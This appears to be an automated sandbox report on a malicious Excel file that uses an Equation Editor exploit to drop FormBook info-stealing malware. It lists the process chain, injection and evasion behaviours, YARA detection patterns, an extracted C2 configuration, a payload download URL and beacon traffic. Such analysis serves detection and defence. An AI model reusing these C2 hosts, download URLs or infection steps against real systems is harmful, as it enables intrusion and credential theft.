Windows Analysis Report
New order.xlsx

Overview

General Information

Sample Name: New order.xlsx
Analysis ID: 626188
MD5: 70583aa55602c8ba0a7f85d815cb5806
SHA1: 7123adf1a048a8168457dcb5aaa9fead90e40218
SHA256: 4da5cb33b2f19fc2d80cafe3e9e9f1a7071d65724ea9316c86c1a635105bab44
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1488 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1484 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1788 cmdline: "C:\Users\Public\vbc.exe" MD5: 69250F55FBFE48822C838B4EEAF33A0A)
      • fdvucso.exe (PID: 2604 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
        • fdvucso.exe (PID: 2324 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • svchost.exe (PID: 736 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
              • cmd.exe (PID: 568 cmdline: /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup
{"C2 list": ["www.worklifefirewalls.com/m9y5/"], "decoy": ["cryptocurrenciesmarketcaps.com", "legaslktiy3.xyz", "cardhj.com", "zouoolaa.xyz", "yjy888.com", "modernboatsalesnadservice.xyz", "zeirishiyamasaki.com", "jamesture.com", "wwwcharleys.com", "walletsw.com", "mbbpaymentplan.com", "lume24.com", "steelonsite.com", "digihm.solutions", "desertunicorns.com", "marbepay.com", "vvv678.com", "73154.xyz", "qzbozhijy.com", "daometalaunch.com", "asproclub.com", "jobeta.net", "whusab.xyz", "delivery-074812.xyz", "magicportriat.com", "floridacommercialprinting.com", "jogodobicho.top", "acessesiteonline01.online", "lakrkajz.xyz", "medicalmassageofpalmbeaches.com", "trendylifeco.com", "upliftpropertysolutions.com", "discountbestdeals.com", "antoniolorenzo.com", "etheteroad.com", "atukr.icu", "xinli-ac.com", "hhydlxs.com", "megabandar.xyz", "olyards.com", "likeama.com", "homes.equipment", "rscall.center", "mayonline.online", "trq-advisors.com", "growyourown.center", "citzensinfo.com", "modernerkredit.com", "chitbucket.com", "kookpedal.com", "tatahotsauce.com", "steadywoman.com", "rfpconsultants.xyz", "insurancecentral.info", "appalachianfamilies.com", "boywhocode.xyz", "a-superb-us-retro-clothes.fyi", "meandmsjones.online", "pastoreemilio.com", "emprendemente.online", "erminelair.com", "doudou-ssr.net", "credit.cool", "dgengcase.com"]}
Source | Rule | Description | Author | Strings
00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      2.2.EQNEDT32.EXE.5acf30.0.raw.unpack | APT_NK_Methodology_Artificial_UserAgent_IE_Win7 | Detects hard-coded User-Agent string that has been present in several APT37 malware families. | Steve Miller aka @stvemillertime
      • 0x16e8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      • 0x16e8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
      6.0.fdvucso.exe.400000.9.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        6.0.fdvucso.exe.400000.9.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.fdvucso.exe.400000.9.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.EQNEDT32.EXE.5acf30.0.unpack | APT_NK_Methodology_Artificial_UserAgent_IE_Win7 | Detects hard-coded User-Agent string that has been present in several APT37 malware families. | Steve Miller aka @stvemillertime
        • 0xae8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        • 0xae8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...

        Exploits

        Source: Network Connection; Author: Joe Security; Data: DestinationIp: 104.168.33.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1484, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
        Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1484, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        No Snort rule has matched

        AV Detection

        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Malware Configuration Extractor: FormBook (configuration identical to the one listed in the Classification section above)
        Source: New order.xlsx; Virustotal: Detection: 40%
        Source: New order.xlsx; ReversingLabs: Detection: 34%
        Source: Yara match; File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match; File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: http://104.168.33.25/gtb/vbc.exe; Avira URL Cloud: Label: malware
        Source: http://104.168.33.25/gtb/vbc.exe; Virustotal: Detection: 13%
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; ReversingLabs: Detection: 36%
        Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 36%
        Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; Joe Sandbox ML: detected
        Source: 6.0.fdvucso.exe.400000.9.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 5.2.fdvucso.exe.120000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.0.fdvucso.exe.400000.7.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.0.fdvucso.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
        Source: 6.2.fdvucso.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

        Exploits

        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Network connect: IP: unknown Port: 80
        Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: vbc.exe, 00000004.00000002.996335800.0000000000789000.00000004.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000005.00000000.977201481.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000005.00000002.985046531.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000006.00000000.980432583.000000000132E000.00000002.00000001.01000000.00000005.sdmp, svchost.exe, 00000008.00000002.1171414662.000000000023C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171982272.0000000000D2F000.00000004.10000000.00040000.00000000.sdmp, fdvucso.exe.4.dr, nsbF6CE.tmp.4.dr
        Source: Binary string: wntdll.pdb source: fdvucso.exe, fdvucso.exe, 00000006.00000003.984908261.0000000000430000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1036425899.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1035304413.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000003.986623998.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1171527322.0000000000690000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1034856361.0000000000380000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171735626.0000000000810000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1036048676.0000000000500000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: fdvucso.exe, 00000006.00000002.1035230712.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1034825185.0000000000030000.00000040.10000000.00040000.00000000.sdmp
        Source: C:\Users\Public\vbc.exe; Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\Public\vbc.exe; Code function: 4_2_004069A4 FindFirstFileW,FindClose,
        Source: C:\Users\Public\vbc.exe; Code function: 4_2_0040290B FindFirstFileW,

        Software Vulnerabilities

        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036604F3 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036605C1 ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_03660467 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_0366044E ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036605DF ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036605AA ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_03660483 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_0366050D URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: global traffic; DNS query: name: www.insurancecentral.info
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe; Code function: 4x nop then pop ebx
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe; Code function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then pop ebx
        Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then pop edi
        Source: global traffic; TCP traffic: 192.168.2.22:49171 -> 104.168.33.25:80

        Networking

        Source: C:\Windows\explorer.exe; Domain query: www.insurancecentral.info
        Source: C:\Windows\explorer.exe; Domain query: www.xinli-ac.com
        Source: Malware configuration extractor; URLs: www.worklifefirewalls.com/m9y5/
        Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox View; ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
        Source: global traffic; HTTP traffic detected: GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1 | Host: www.xinli-ac.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
        Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 13 May 2022 15:21:05 GMT | Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 | Last-Modified: Fri, 13 May 2022 09:01:34 GMT | ETag: "43da0-5dee0ebd81a80" | Accept-Ranges: bytes | Content-Length: 277920 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
        Source: global traffic; HTTP traffic detected: GET /gtb/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 104.168.33.25 | Connection: Keep-Alive
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: unknown; TCP traffic detected without corresponding DNS query: 104.168.33.25
        Source: EQNEDT32.EXE, 00000002.00000002.966815711.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: EQNEDT32.EXE, 00000002.00000002.966815711.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
        Source: EQNEDT32.EXE, 00000002.00000002.966770565.0000000000594000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.33.25/gtb/vbc.exe
        Source: EQNEDT32.EXE, 00000002.00000002.966741326.0000000000554000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.33.25/gtb/vbc.exehhC:
        Source: EQNEDT32.EXE, 00000002.00000002.967017696.0000000003660000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.33.25/gtb/vbc.exej
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com/
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: vbc.exe, 00000004.00000000.965645699.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.996078709.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: explorer.exe, 00000007.00000000.1023300017.0000000006450000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://treyresearch.net
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.%s.comPA
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
        Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
        Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
        Source: explorer.exe, 00000007.00000000.998621484.00000000077C9000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.mozilla.com0
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: explorer.exe, 00000007.00000000.999392147.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
        Source: explorer.exe, 00000007.00000000.1025885348.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999748239.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
